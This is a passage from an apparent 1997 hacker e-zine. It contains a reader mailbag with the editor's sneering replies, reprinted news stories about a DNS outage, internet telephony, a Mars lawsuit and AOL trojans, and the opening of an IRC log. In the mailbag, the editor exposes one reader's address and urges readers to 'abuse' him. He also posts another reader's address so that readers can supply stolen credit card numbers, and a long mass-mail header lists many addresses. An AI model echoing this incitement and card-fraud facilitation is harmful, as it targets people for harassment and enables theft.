  2090. 0-d4y s1t3 l15ts 4r3 0uT 0f d4t3 4nD y0u 4r3 r34lly l33t! w3 sh0uld f0rm  
  2091. a l33t hax0rs 0nly gr0up 4nd tr4d3 w4r3z#!@#$@#$@#@#$@#% 
  2092. 3m4il m3 b4ck wi7h s0m3 si7e liSt AnD yOuR RePly tO hAxOrInG#$@$%^@#%$@$#^ 
  2093.  
  2094. acidburn@aol.com 
  2095.  
  2096.  
  2097.            [ umm, sorry 'acidburn' but i just cant read your 'ereet' text. i can 
  2098.                 not understand what  you are saying, sorry. ] 
  2099. --- 
  2100. Subject:  
  2101.             Hi 
  2102.    Date:  
  2103.             Thu, 10 Jul 97 06:26:25 +0000 
  2104.    From:  
  2105.             MegaBrat13@aol.com 
  2106.         To:  
  2107.             FoxMulder@worldnet.att.net 
  2108.  
  2109.  
  2110. So where can I get havoc the program? 
  2111.  
  2112.            [ wtf? ] 
  2113. --- 
  2114.  
  2115. Date: Tue, 22 Jul 1997 01:37:21 -0700 
  2116. From: Joe Roebuck <xei33@dial.pipex.com> 
  2117. To: scud@thtj.com 
  2118. Subject: (no subject) 
  2119. X-URL: ftp://guest:macwarez@207.16.248.126/darkdajimbo/pages/kewl.htm 
  2120.  
  2121. while scouring the net for elite hackers to join power empires ELITE  
  2122. FACTION - your name got mentioned... 
  2123. if you would like to be part of an elite faction of  
  2124. hackers/crackers/virii etc then please reply to this message at  
  2125. xei33@dial.pipex.com. 
  2126. If you are on here accidently then ignore this message and if you are  
  2127. already in power empire ignore this message, otherwise hit return and  
  2128. join the elite faction. 
  2129.  
  2130. Power empire has over 600 members and 6 different factions, the King is  
  2131. looking to set up an elite faction and has been looking for worthy  
  2132. members, your naem has come up..... 
  2133. if your interested mail the king at xei33@dial.pipex.com 
  2134.  
  2135.  
  2136. [ 10 minutes of laughter.......... ] 
  2137.  
  2138. [ 10 more minues of laughter ....... ] 
  2139.  
  2140. --- 
  2141.  
  2142.  
  2143. Subject:  
  2144.             password cracking 
  2145.    Date:  
  2146.             Wed, 23 Jul 97 18:02:05 +0000 
  2147.    From:  
  2148.             "KeViN TRaViS" <just4kevin@hotmail.com> 
  2149.         To:  
  2150.             mcoyle@sirinet.net 
  2151.         CC:  
  2152.             FoxMulder@worldnet.att.net [KFF got this one too] 
  2153.  
  2154.  
  2155. i have a problem that only a hacker can solve.  i just moved out and my  
  2156. father gave me his computer, complete with his internet account.  the  
  2157. problem:  he left blocks to certain web sites that i don't know the  
  2158. password to (you know those RSACi blocks?).  how can I get through these  
  2159. blocks and/or crack his password. 
  2160. :lestat 
  2161.  
  2162. ______________________________________________________ 
  2163. Get Your Private, Free Email at http://www.hotmail.com 
  2164.  
  2165.  
  2166. [ look, little underage kiddies should not be looking at porn. shame on you. ] 
  2167.  
  2168. ---- 
  2169.  
  2170. Subject:  
  2171.             Mailing List 
  2172.    Date:  
  2173.             Mon, 14 Jul 97 04:06:29 +0000 
  2174.    From:  
  2175.             SickboyJR@aol.com 
  2176.         To:  
  2177.             Scud-O 
  2178.  
  2179.  
  2180. can you please put me on the mailing list? send the journal to: 
  2181. danishiqbal@juno.com 
  2182.  
  2183.                          [ DAMNIT! I THOUGHT I TOLD YOU PEOPLE TO STOP USING MY 
  2184.                          OLD E-MAIL ADDRESS!!!!, to teach you a lesson, im not gunna 
  2185.                          cover up yer e-mail, so you readers, feel free to abuse 
  2186.                          this aoler. ] 
  2187.  
  2188.  
  2189. --- 
  2190.  
  2191. Subject:  
  2192.             mailing list 
  2193.    Date:  
  2194.             Mon, 14 Jul 97 22:51:56 +0000 
  2195.    From:  
  2196.             PsYcHoFaZe@aol.com 
  2197.         To:  
  2198.             Scud-O 
  2199.  
  2200.  
  2201. can i join your mailing list's? my e-mail address is  
  2202. psychofaze@aol.com 
  2203.  
  2204.                         [ read above ]  
  2205. --- 
  2206.  
  2207. Subject:  
  2208.             thtj.com 
  2209.    Date:  
  2210.             Mon, 14 Jul 97 04:44:25 +0000 
  2211.    From:  
  2212.             psych0 
  2213.         To:  
  2214.             <Scud-O> 
  2215.  
  2216.  
  2217. it doesn't work.  i cannot access your server.  netscape just sits there 
  2218. and times out, and if i set ping to send 20 packets, only about 2 or 3 
  2219. come back, the rest time out.  what's up with this?  aren't you paying a 
  2220. bit of money for this?  i think it's time to give nethosting.com a nasty 
  2221. letter.... 
  2222.  
  2223. [ i agree, i agree. nethosting www server is fine, but every other server 
  2224. is totally fucked up... oh well.... cant wait to move.... ]  
  2225.  
  2226. --- 
  2227.  
  2228. Subject:  
  2229.             Subscribe to THTJ 
  2230.    Date:  
  2231.             Sun, 13 Jul 97 06:53:47 +0000 
  2232.    From:  
  2233.             AbrAxaS <abraxas@internetwis.com> 
  2234.         To:  
  2235.             Scud-O 
  2236.  
  2237.  
  2238. Hey, can ya hook me up with the current THTJ and any back issues 
  2239. available.  I'd appreciate it and may be interested in submitting for 
  2240. future editions.  Thanx, take 'er easy. -=] AbrAxaS [=- 
  2241.  
  2242. [ look, to you and the 500 other people who ask me this question each 
  2243. month, i DO NOT HAVE THE TIME to send you every issue of thtj. if i did, all 
  2244. i would do in life is send out thtj - since it would be a 24/7 job. go 
  2245. download it yerself ya bum. ] 
  2246.  
  2247.  
  2248. --- 
  2249.  
  2250. Subject:  
  2251.             Web Ring 
  2252.    Date:  
  2253.             Thu, 17 Jul 97 17:54:07 +0000 
  2254.    From:  
  2255.             "X-human" <X-human@inil.com> 
  2256.         To:  
  2257.             <Scud-O> 
  2258.  
  2259.  
  2260. X-human here 
  2261.  
  2262.   I was woundering if you wanted to be in my web ring called Phreakz "R" 
  2263. Uz. A new Web Ring. I am looking for good phreaking pages that are phone 
  2264. losers of america, prank, or just plain phreaking.I like your page and 
  2265. wounder if you want to join my ring please droop me a line if you do.  
  2266. Thank you for your time. 
  2267. \      /  
  2268.  \    / 
  2269.   \  / 
  2270.    \/-}{ⁿ/\/\σ/\/ ;P 
  2271.    /\President of Bad Taste Inc.  Phreaks "R" Us corp. 
  2272.   /  \Creativeity Board of Directors for the Who 
  2273.  /    \Ring Master of the Phreakz "R" Uz Web Ring 
  2274. /      \Ring Master of the Made in NotePad Web Ring 
  2275.  
  2276.  
  2277.  
  2278. [ i really dont go for web rings, but i may start doing so, if i do i will 
  2279. join up woth you. i posted your e-mail in case any of the readers want to 
  2280. join with you. i hope you dont mind. ] 
  2281.  
  2282. --- 
  2283.  
  2284. Subject:  
  2285.             unabomber 
  2286.    Date:  
  2287.             Sun, 13 Jul 97 05:01:43 +0000 
  2288.    From:  
  2289.             phett <weasel@bluemoon.net> 
  2290.         To:  
  2291.             Scud-O 
  2292.  
  2293.  
  2294. hey, 
  2295.            is unabomber from the wester ny area? i'm in need of some local folk's 
  2296. to relate shit to. let me know if you can find out. 
  2297.                          phett 
  2298.  
  2299.  [ no, he's not from ny. where he is from, i will never tell. ] 
  2300. --- 
  2301.  
  2302. Subject:  
  2303.             HELP 
  2304.    Date:  
  2305.             Tue, 15 Jul 97 15:05:30 +0000 
  2306.    From:  
  2307.             "apiter@usa.net" <apiter@usa.net> 
  2308.         To:  
  2309.             Scud-O 
  2310.  
  2311.  
  2312. I'm Sorry i badly write as to English. 
  2313. I from Russia Saint-Peterstburg. 
  2314. Help please to me need real number 
  2315. credit card for registration IBM global 
  2316. Network. 
  2317. My E-Mail: apiter@usa.net 
  2318.                                         Big Thanks 
  2319.  
  2320.  
  2321.  [ i dont card myself, now i would normally mock you for carding because it 
  2322.  is stupid,but,  since you are a Russian Comrade, i posted your e-mail incase 
  2323.  one of our readers can help you out. i hope one of them does. ] 
  2324.  
  2325.  
  2326. --- 
  2327.  
  2328. Subject:  
  2329.                     D-Con 
  2330.            Date:  
  2331.                     Wed, 16 Jul 97 17:37:11 +0000 
  2332.            From:  
  2333.                     xxxxxxxx <xxxxxxxx@xxx.net> 
  2334.     Reply-To:  
  2335.                     x.x.xxx@xxxx.xxx.net, xxx@xxxx.xxx.net, xxxx@xxxx.xxx.net, 
  2336.                     xxxxxx@xxxx.xxx.net, xx.@xxxx.xxx.net, xxxxx@xxxx.xxx.net 
  2337. Organization:  
  2338.                     - 
  2339.                 To:  
  2340.                     Scud-O 
  2341.  
  2342.  
  2343. Hey did you go to the Con in Vegas if so Email your deal at  
  2344. xxxxxxxx@xxx.com or xxxxxx@xxxxxxxxx.net im doing a piece for a movie  
  2345. the pusuit of cyberculture-- get to me 
  2346.  
  2347.  
  2348.  [ dont make me laugh.... ] 
  2349.  
  2350. --- 
  2351.  
  2352. Subject:  
  2353.             nice 
  2354.    Date:  
  2355.             Tue, 15 Jul 97 19:53:39 +0000 
  2356.    From:  
  2357.             BlueBox868@aol.com 
  2358.         To:  
  2359.             Scud-O 
  2360.  
  2361.  
  2362.  I really learned a lot from your page man.  I loved it.  You need to E mail 
  2363. me sometime so that we can talk about phreaking or hacking.  See ya man. 
  2364.  
  2365.   In case your wondering 18/M here, 
  2366.  
  2367.  
  2368.  [ um, i wasnt wondering, and i dont care about yer aol a/s checks. and if you 
  2369.  want to talk phreak, e-mail me, im sorry but my life is too busy to just 
  2370.  start talking with complete strangers. ] 
  2371.  
  2372.  
  2373. --- 
  2374. Reply-To: "Cracker" <cracker@waymark.net> 
  2375. From: "Cracker" <cracker@waymark.net> 
  2376. To: <scud@thtj.com> 
  2377. Date: Sun, 20 Jul 1997 09:58:54 -0500 
  2378. X-MSMail-Priority: Normal 
  2379. X-MimeOLE: Produced By Microsoft MimeOLE Engine V4.71.0544.0 
  2380.  
  2381. Join the power empire---visit us to learn more about us at http://homepages. 
  2382. waymark.net/~cracker/ 
  2383.  
  2384.  
  2385.  
  2386. [ ummm.... wtf? ] 
  2387.  
  2388. --- 
  2389.  
  2390. Date: Sun, 27 Jul 1997 18:07:47 -0400 
  2391. From: Spooky <spookyy@erols.com> 
  2392. Organization: Probably hiding somewhere in the shadows...clutching her modem. 
  2393. To: bertoli@australia.net.au, acid@smtp1.erols.com, frogy@aol.com, 
  2394.            actionman@thepentagon.com, "@actmatrix"@gnn.com, kblue@ziplink.net, 
  2395.            jmfoster@mtu.edu, acidhack@smtp1.erols.com, 0@aol.com, 
  2396.            alex@is-bremen.de, ailurophilia@psynet.net, archum55@aol.com, 
  2397.            Mistryx@ix.netcom.com, babygoat@usit.net, badboy@cei.net, 
  2398.            bernies@2600.com, big_mac@pacific.net.sg, Black_So_6@hotmail.com, 
  2399.            bob@sitecraft.com, borison@ibm.com, oblivion@10pht.com, 
  2400.            bbuster@succeed.net, lychees@bellsouth.net, mindcocaine@hotmail.com, 
  2401.            phreak@deathsdoor.com, qdgh09b@prodigy.com, cracked@primenet.com, 
  2402.            ChAos@smtp1.erols.com, 1021@aol.com, carzydevil@geocities.com, 
  2403.            yczn98a@prodigy.com, cyberchaos@geocities.com, bstock@cris.com, 
  2404.            fist@ping.at, viviana1@idt.net, arctcfox@warwick.net, 
  2405.            darkdajimbo@northeast.demon.co.uk, damage@idt.net, zpvg33a@prodigy.com, 
  2406.            scud@thtj.com, dasxdeath@aol.com, 2rump@flash.net, nomad@imagin.net, 
  2407.            steven20steven@juno.com, deathhead@pointbrk.erkware.com, 
  2408.            demaxxus@usa.net, christopher_mewhort@sunshine.net, djgad@aol.com, 
  2409.            qfwg61a@prodigy.com, DolphinBoy@juno.com, 
  2410.            blizzardskick@worldnet.att.net, dzca66a@prodigy.com, 
  2411.            exilesquid@earthlink.net, lordfaust@mailcity.com, 
  2412.            wysiwyg@netwestonline.com, wicket@slip.net, bc@koan.com, 
  2413.            bassin@worldnet.att.net, faheem@innotts.co.uk, tempest30@aol.com, 
  2414.            draco@lords.com, goncalves@process.com, hackers24@hotmail.com, 
  2415.            stormn@wave.co.nz, krees@downeast.net, snake7@swbell.net, 
  2416.            hotheazip@aol.com, shvostov@accesscom.com, howthehel@aol.com, 
  2417.            icefx@idt.net, in@smtp1.erols.com, quotes@aol.com, 
  2418.            illusionz@mail.geocities.com, jjd@netcomuk.co.uk, trifraug@mscomm.com, 
  2419.            KoDiaK@hotmail.com, kripto@hotmail.com, kwantam@mailhost.net, 
  2420.            icowart@sprintnet.com, Ryder@sisna.com, xebec@juno.com, 
  2421.            lordsome@cris.com, lumpster@aol.com, Mad_hacker@juno.com, 
  2422.            mage2@earthlink.net, commodore64@geocities.com, mnikon@sundial.net, 
  2423.            patrickbc@freemark.com, georgina@linknet.net, melvyn@mbwa.demon.co.uk, 
  2424.            metl2rhcp@aol.com, moroni@scranton.com, muardib@freemark.com, 
  2425.            mudge@10pht.com, dravis@mdc.net, necroman@juno.com, 
  2426.            prophet9980@pacbell.net, powder@bright.net, butler@tir.com, 
  2427.            k0p@iti2.net, ovrsoul@main.com, mcoyle@sirinet.net, 
  2428.            phantom2000@msn.com, mark@panicx.com, phreak@megalink.net, 
  2429.            a666@smtp1.erols.com, cool@aol.com, tedphreak@aol.com, 
  2430.            hchitten@sprynet.com, psykon@hotmail.com, stuartlock@intonet.co.uk, 
  2431.            revelation@mindspring.com, roma@loop.com, rowboat@telis.org, 
  2432.            emiley@cae.wisc.edu, shadout@smtp1.erols.com, xx@aol.com, 
  2433.            chriss@burgoyne.com, spacerog@10pht.com, sublime61@aol.com, 
  2434.            mauricer@videotron.ca, sward@magicnet.net, ufc@chaos.gun.de, 
  2435.            velocity@nym.alias.net, 81764205@cshore.com, vylent@hotmail.com, 
  2436.            warman0@hotmail.com, msteen@postoffice.ptd.net, tmbg91@aol.com, 
  2437.            jklh60a@prodigy.com, x1scythe@aol.com, zep@garbage.bridge.net, 
  2438.            zillion@gatecoms.gatecom.com, zol@smtp1.erols.com, tar12@aol.com, 
  2439.            hutcheson@btinternet.com 
  2440. Subject: Hackbook 
  2441.  
  2442. Most of the material thats in people's faces is anti-hack.  They spend countless hours, 
  2443. pages, bandwidth, what have you, blabbing on and on about how evil the hacking society 
  2444. is.  How addicted and destructive we all are. 
  2445.  
  2446. I'd like to change that.  I want you to send me something about yourself and why 
  2447. you hack/phreak, your opinions on it.  Be it an essay, a story, anything! i'm not 
  2448. picky.  Though it must be done well.  Spend some time on it.  You're representing 
  2449. hackers/phreakers world round.  You don't have to include your real name or any RL 
  2450. information about yourself.  Just your handle, something to identify yourself by and I 
  2451. won't include your e-mail address if you don't want me to.  It can be as abstract or as 
  2452. realistic as you like it but it has to be about YOU and some of the little episodes 
  2453. that people usually don't get a chance to experience and see. There's no page 
  2454. limit...the longer the better.  Be as detailed as possible.  NO LAMERS ACCEPTED! 
  2455.  
  2456. After this is done my main goal is to get this thing published. So, if you have any 
  2457. contacts, ideas, submissions, whatever, e-mail me: 
  2458.  
  2459. spookyy@erols.com 
  2460.  
  2461. The beginning deadline is October 31, 97. 
  2462.  
  2463.  
  2464.  
  2465. [ roflol!@#?@$@#!$#%!@$ ] 
  2466. _____________________________________________________________ 
  2467.  
  2468.                                                    
  2469.                                                   --------------    
  2470.                                                  --=[The News]=-- 
  2471.                                     Compiled & edited by KungFuFox 
  2472.                                                   -------------- 
  2473.  
  2474.         1 : Snafu sets off chaos on Net Human error 
  2475.         2 : German Telco Pioneers Internet Telephony  
  2476.         3 : 3 Yemenis sue NASA for trespassing on Mars   
  2477.         4 : AOL Posts Sentry against Viruses 
  2478.             
  2479.            <anonymous> why can't you bastards make some news? 
  2480. _____________________________________________________________ 
  2481.   
  2482.  Snafu sets off chaos on Net Human error: 
  2483.  E-mail blocked and Web sites vanish. 
  2484.  By David L. Wilson and Elizabeth Wasserman, Mercury News Staff Writers  
  2485.   
  2486.  A human error sent the global Internet into chaos Thursday, bouncing  
  2487.  millions of e-mail messages back to senders and repeatedly informing users  
  2488.  that their favorite Web sites simply did not exist. 
  2489.  
  2490. The cyberspace meltdown began in the early morning hours after a technician  
  2491. at Network Solutions Inc. in Virginia, which controls the Net's most  
  2492. important electronic directory of addresses, programmed the network's  
  2493. computers with incorrect data.  
  2494.  
  2495. Thursday's huge outage renewed concerns about the fragile underpinnings of  
  2496. the Internet, the global network of networks that is playing an increasingly  
  2497. critical role in commerce and communications.  
  2498.  
  2499. Employees of Network Solutions quickly sent out corrected address information  
  2500. to the Internet's computers, but the fix took hours to trickle down through  
  2501. all the systems used to route data in cyberspace. Intermittent outages  
  2502. continued throughout the day. 
  2503.  
  2504. While the garbling of the address database is not unprecedented, experts said  
  2505. the disruption was unusual because of its scope and persistence. "I don't  
  2506. think I've seen it this bad before," said Todd Stanford, an Internet  
  2507. consultant in San Jose who spent much of the day wrestling with problems  
  2508. caused by the outage. 
  2509.  
  2510. Network Solutions, which is responsible for administering the most popular  
  2511. "domain names," including those ending with .com, is also responsible for  
  2512. programming key computers on the Net used to route data. The addressing  
  2513. information is stored in the Domain Name Server system. 
  2514.  
  2515. When any kind of information -- whether electronic mail or a Web site address  
  2516. -- is sent out on the Net, the sender's local computers check with other  
  2517. computers, called servers, that are part of the Domain Name Server system, to  
  2518. ensure proper delivery. For example, if a person sends an e-mail missive to  
  2519. joe@internetprovider.com, the sender's system looks to the Domain Name Server  
  2520. system to see how the e-mail should be routed. 
  2521.  
  2522. Server hierarchy 
  2523.  
  2524.  If the necessary address information can't be found on a local computer,  
  2525.  that local server checks with another address server higher up the chain.  
  2526.  The most important parts of the system are the top-level domain zone  
  2527.  servers. There are nine of them, eight in the United States and one in  
  2528.  Europe. 
  2529.  
  2530. In cases where the Internet routing computers get confused or don't know what  
  2531. to do next, they look to these top-level servers for instructions, and the  
  2532. top-level servers have final authority. 
  2533.  
  2534. It was while implementing one of the regular updates to the database on the  
  2535. top-level servers Wednesday night that an unidentified Network Solutions  
  2536. technician erred, the company said. A glitch in Network Solutions computers  
  2537. created bad information in files that the technician was preparing to  
  2538. transmit to the servers. The company has monitoring software that can spot  
  2539. such glitches, but the technician implemented the update despite the alert  
  2540. from the software, violating company policy. 
  2541.  
  2542. The result was that the database on the Net for two types of domains, those  
  2543. that end in .com and .net, was corrupted. 
  2544.  
  2545. Hopeless muddle 
  2546.  
  2547.  The erroneous updates went out about 2:30 a.m. EDT Thursday, and slowly  
  2548.  spread through the address system. By the time a corrected version of the  
  2549.  file was distributed by Network Solutions about four hours later, much of  
  2550.  the Internet's addressing mechanism was hopelessly muddled. 
  2551.  
  2552. "The Internet's never been as reliable as something like the phone system,"  
  2553. said David Filo, co-founder of Yahoo, the Silicon Valley company that helps  
  2554. people search the Web. "Over the last few years, it's actually gotten better.  
  2555. At the same time, it's been growing so rapidly that in some sense, it's also  
  2556. gotten more fragile." 
  2557.  
  2558. "The people who are assuming that they are building on a stable  
  2559. infrastructure are in for some big surprises," said Eugene H. Spafford, head  
  2560. of a computer security lab at Purdue University. 
  2561.  
  2562. To Spafford, there was also a lighter side to the outage. "It was actually  
  2563. very pleasant. I went a whole day without getting any spam. I got a lot done  
  2564. and I'm thinking we may need to do this more often." 
  2565.  
  2566. Despite the explanation of human error, many observers suspected something  
  2567. more nefarious at work, perhaps a prank launched last week that may have  
  2568. gotten out of hand. 
  2569.  
  2570. Hijacking InterNIC 
  2571.  
  2572.  Network Solutions operates an entity called InterNIC, under contract to the  
  2573.  National Science Foundation, that handles registration of some of the most  
  2574.  important domain names. On July 11, a group calling itself "AlterNIC," which  
  2575.  objects to what it calls InterNIC's monopoly on registration of some domain  
  2576.  names, hijacked the main Web address used to access InterNIC.  
  2577.  
  2578. InterNIC controls registration to the domain names .com, .net, .edu, .org,  
  2579. .gov and .mil. 
  2580.  
  2581. Rival companies such as AlterNIC have created their own categories of domain  
  2582. names, such as .biz, but those have not been as widely accepted on the Net,  
  2583. and not every Net user can reach sites that they register. 
  2584.  
  2585. Over the weekend, AlterNIC used a security flaw in many Internet computers to  
  2586. redirect Net users who tried to access "www.internic.net" to the AlterNIC  
  2587. site, in what the company described as a "protest." (Users could still get to  
  2588. the InterNIC from the AlterNIC site, or use InterNIC's alternate address,  
  2589. http://rs.internic.com/). 
  2590.  
  2591. "By redirecting the domain name `www.internic.net,' we are protesting the  
  2592. recent InterNIC claim to ownership of `.com,' `.org,' and `.net,' which they  
  2593. were supposed to be running in the public trust," said a letter from  
  2594. AlterNIC's Eugene Kashpureff, the chief financial officer, posted on the  
  2595. AlterNIC Web site. "Our apologies for any trouble this DNS domain name system  
  2596. protest has caused you." 
  2597.  
  2598. Kashpureff, in an interview, said the company ended the protest Monday  
  2599. morning, but as late as Thursday, some Net users were still being routed to  
  2600. the AlterNIC site when they tried to access InterNIC. 
  2601.  
  2602. Both Kashpureff and Network Solutions deny that his actions led to Thursday's  
  2603. problems. 
  2604.  
  2605. Others suspected a deliberate attack on the network's infrastructure,  
  2606. something that federal authorities have been sweating about for years. An FBI  
  2607. agent who agreed to comment on condition of anonymity said, "This is clearly  
  2608. one way of damaging the economic interests of this country, and we are  
  2609. looking at this incident, any such incident, for evidence that this is a  
  2610. deliberate act of sabotage. But we have no evidence at all to suggest that at  
  2611. the present time." 
  2612.  
  2613. Bill Orvis, a member of the Energy Department's Computer Incident Advisory  
  2614. Capability at Lawrence Livermore Lab, agreed. "It's not impossible that  
  2615. there is some kind of attack going on, but I think the odds of this one thing  
  2616. being an attack are low." 
  2617.  
  2618. ⌐1997 San Jose Mercury News 
  2619. _____________________________________________________________ 
  2620.  
  2621.  German Telco Pioneers Internet Telephony  
  2622.  (07/18/97; 6:30 p.m. EDT) 
  2623.  By Douglas Hayward, TechWire 
  2624.  
  2625.  FRANKFURT, Germany -- Internet voice telephony took a giant leap forward  
  2626.  Friday when Deutsche Telekom became the first of the world's major telephone  
  2627.  companies to launch an international trial of the fledgling technology. 
  2628.  
  2629. Deutsche Telekom, Europe's largest telecommunications carrier and Internet  
  2630. service provider, said it has begun piloting an Internet-based voice  
  2631. telephony service between the United States, Germany, Japan and Canada. The  
  2632. pilot, which involves customers using ordinary handsets rather than  
  2633. computers, will involve 1,000 users, mostly employees of multinational  
  2634. companies. 
  2635.  
  2636. "The targets of this project are to test the technology, to analyze the  
  2637. usage, and to evaluate whether Internet telephony can be offered at lower  
  2638. rates than conventional telephone service," Deutsche Telekom said in a  
  2639. statement Friday. 
  2640.  
  2641. The service will be restricted to selected regions, mostly large cities,  
  2642. within the four countries. Customers will use ordinary telephones to call a  
  2643. number in each country that routes their calls to an Internet "gateway." From  
  2644. the gateway, voice signals are compressed into digitized information  
  2645. "packets," which are transported across the Internet, using the TCP/IP  
  2646. protocol, to the gateway nearest the number they are calling. At this second  
  2647. gateway, the call is decompressed, and it re-enters the ordinary public  
  2648. telephone network as an seemingly ordinary telephone call. 
  2649.  
  2650. Deutsche Telekom will not charge pilot customers for the cost of carrying the  
  2651. call over the Internet nor for the cost of terminating the call over the  
  2652. public network. Instead, callers will only have to pay the cost of accessing  
  2653. the gateways, set at about 24 pfennings (13 cents) a minute û just under a  
  2654. fifth of the cost of a normal voice call from Germany to the United States. 
  2655.  
  2656. Analysts welcomed the announcement by Deutsche Telekom. "This is an  
  2657. interesting and creative move," said Andrew Clarke, an analyst at  
  2658. London-based telecommunications researcher Philips Tarifica. "It will be  
  2659. interesting to see how Deutsche Telekom charges for the full service. I would  
  2660. estimate very roughly that the full charge could be around 60 pfennings (33  
  2661. cents) a minute, which is cheap but not so cheap that it's almost free," he  
  2662. said. 
  2663.  
  2664. Although the Finnish national telco announced an Internet telephony service  
  2665. several months ago, Deutsche Telekom is the first major telco to embrace the  
  2666. technology. Tarifica estimated in May this year that independent Internet  
  2667. voice telephony carriers would cost Deutsche Telekom, British Telecom and  
  2668. France Telecom a combined total of some $372 million per year by 2001. 
  2669.  
  2670. "The major telcos are all testing this technology, but it's an interesting  
  2671. and positive sign that it was Deutsche Telekom that was the first to come out  
  2672. into the open," said Cathy Burrows, a British-based analyst at researcher  
  2673. International Data Corp. "At the end of the day, pricing is going to be key.  
  2674. Every telco has to think very carefully about what their approach is going to  
  2675. be." 
  2676.  
  2677. Even at the rate of 60 pfennings, Deutsche Telekom will likely be undercut by  
  2678. independent carriers such as Hackensack, N.J.-based IDT, which is about to  
  2679. introduce handset-based Internet telephony for 10 cents a minute between  
  2680. Germany and the United States. "We can beat Deutsche on price and scope, and  
  2681. we think we can beat them on quality too," said Sarah Hofstepter, a  
  2682. spokeswoman for IDT.  
  2683.  
  2684. "It looks like Deutsche Telekom's pilot is being pitched as an alternative to  
  2685. [charge] cards and to call-back services rather than as a competitor to  
  2686. traditional telephony," Tarifica's Clarke said. "That shows Deutsche Telekom  
  2687. is using Internet telephony creatively." 
  2688.  
  2689. Many analysts said that the major carriers have no choice in the matter they  
  2690. have to embrace the Internet in order to control and contain it. 
  2691.  
  2692. "Deutsche Telekom has realized that it makes sense for you to get into  
  2693. Internet telephony early, so that if users are tempted to defect to voice  
  2694. telephony, they at least are tempted onto your service rather than onto  
  2695. someone else's," said Clarke. "If your throat is going to be cut anyway, why  
  2696. not do it yourself?" 
  2697.  
  2698. ⌐CMP Media, 1996. 
  2699. _____________________________________________________________ 
  2700.      
  2701.  3 Yemenis sue NASA for trespassing on Mars   
  2702.  They say they inherited it 3,000 years ago   
  2703.  July 24, 1997 
  2704.   
  2705.  WASHINGTON (CNN) -- No one expects to lose much sleep over it but, for the  
  2706.  record, NASA has been sued by three men from Yemen for invading Mars.   
  2707.  
  2708. The three say they own the red planet, and claim they have documents to prove  
  2709. it.   
  2710.  
  2711. "We inherited the planet from our ancestors 3,000 years ago," they told the  
  2712. weekly Arabic-language newspaper Al-Thawri, which published the report  
  2713. Thursday.   
  2714.  
  2715. Adam Ismail, Mustafa Khalil and Abdullah al-Umari filed the lawsuit in San'a,  
  2716. Yemen, and presented documents to the country's prosecutor general which they  
  2717. say proves their claim. There was no word on whether they had paid the  
  2718. appropriate inheritance taxes.   
  2719.  
  2720. The claim is prompted, apparently, by the exploration of Mars by NASA's  
  2721. Pathfinder spacecraft and Sojourner rover, which have been sending back  
  2722. photos and data for analysis since early July.   
  2723.  
  2724. "Sojourner and Pathfinder, which are owned by the United States government,  
  2725. landed on Mars and began exploring it without informing us or seeking our  
  2726. approval," the men charge.   
  2727.  
  2728. They demand the immediate suspension of all operations on Mars until a court  
  2729. delivers a verdict. They also ask that NASA refrain from disclosing any  
  2730. information pertaining to Mars' atmosphere, surface or gravity before  
  2731. receiving approval from them, or until a verdict is reached.   
  2732.  
  2733. 'It's a ridiculous claim'    
  2734.  
  2735. "It's a ridiculous claim," NASA news chief Brian Welch told CNN Thursday  
  2736. after smothering a chuckle. "Mars is a planet out in the solar system that is  
  2737. the property of all humanity, not two or three guys in Yemen."   
  2738.  
  2739. Richard Cook, the Pathfinder mission manager at NASA's Jet Propulsion  
  2740. Laboratory in Pasadena, California, agreed. "It's everybody's," he said.  
  2741. "Mars is for the whole world to explore and to understand."   
  2742.  
  2743. Welch says a 1967 international treaty holds that everything in the solar  
  2744. system, except Earth itself, is the property of everyone in the world and no  
  2745. one country.   
  2746.  
  2747. "Just because we land on Mars first doesn't mean the United States owns it,"  
  2748. he said.   
  2749.  
  2750. Welch said he thought the issue could get more serious in the future "when  
  2751. people actually are going to these places and the resources found have some  
  2752. value. ... More complicated issues will have to be resolved between  
  2753. countries, or between companies."   
  2754.  
  2755. Taking the opportunity to clear the air on another galactic real estate  
  2756. matter, Welch said he knew of no plans to take legal action against a man who  
  2757. has been selling deeds to property on the moon.   
  2758.  
  2759. Welch said the deeds are as worthless as the Yemenis' claims. "That's why  
  2760. they invented the phrase 'Caveat emptor' [Let the buyer beware]," he said.   
  2761.  
  2762. ⌐1997 CNN 
  2763. _____________________________________________________________ 
  2764.  
  2765.  AOL Posts Sentry against Viruses 
  2766.  by David Lazarus  
  2767.  
  2768.  12:08pm 30.Jul.97.PDT -- Those darn Trojan horses are still knocking at  
  2769.  America Online's door, so the service introduced a new feature Wednesday  
  2770.  intended to prevent members from letting a virus slip through the gates. The  
  2771.  "Download Sentry" is an automatic warning that pops up each time an AOL  
  2772.  subscriber attempts to download email attachments to his or her hard drive.  
  2773.  
  2774. "We have seen over the last several months an increasing number of Trojan  
  2775. horses, and more members downloading them," said AOL spokeswoman Tricia  
  2776. Primrose. "This is a real effort to educate members that there are files out  
  2777. there that can contain viruses."  
  2778.  
  2779. What these Trojan horses do is enter one's hard drive when an email  
  2780. attachment is activated, and then lurk in the shadows until the next time you  
  2781. log on to AOL. The virus then leaps forward, snatches your password and sends  
  2782. it back to a waiting hacker, who could, if so inclined, perpetrate all manner  
  2783. of mischief. Most Trojan horses cannot be spotted in advance by anti-virus  
  2784. programs.  
  2785.  
  2786. Tatiana Gau, AOL's vice president of integrity assurance, said "an increasing  
  2787. number" of members have actually activated Trojans. Often, the virus is  
  2788. masked behind enticing commands like GAMES.EXE, PORN.EXE, and PLAYBOY.ZIP.  
  2789. They also hide within add-ons for popular software titles, or in free  
  2790. screensavers.  
  2791.  
  2792. The new Download Sentry aims to remind AOL members of the danger. When an  
  2793. email message with an attached file is downloaded, a window pops up and says:  
  2794. "Warning! You are about to download a file which contains executable code.  
  2795. Downloading files from unknown sources might cause harm to your computing  
  2796. environment or display objectionable material. Do you wish to proceed?"  
  2797.  
  2798. If the answer is yes, members do so at their own risk. Those who don't need  
  2799. to be told twice have the option of switching off the alert.  
  2800.  
  2801. "The Download Sentry will help our members help themselves - by reminding  
  2802. them not to download email files sent to them from unknown sources," Gau  
  2803. said.  
  2804.  
  2805. ⌐1993-97 Wired Ventures, Inc. 
  2806. _____________________________________________________________ 
  2807.  
  2808. Logs - from the staff of thtj and our thtj readers... 
  2809.  
  2810. 1- zer0_hex.log - from Keystroke 
  2811.  
  2812. Session Start: Wed Jun 18 14:17:41 1997 
  2813. <PcExpoKey> Hey =) 
  2814. <PcExpoKey> Are you the same Zer0-Hex who writes for that cool magizine thing? 
  2815. [14:18] <ZeR0-HeX> uh hi 
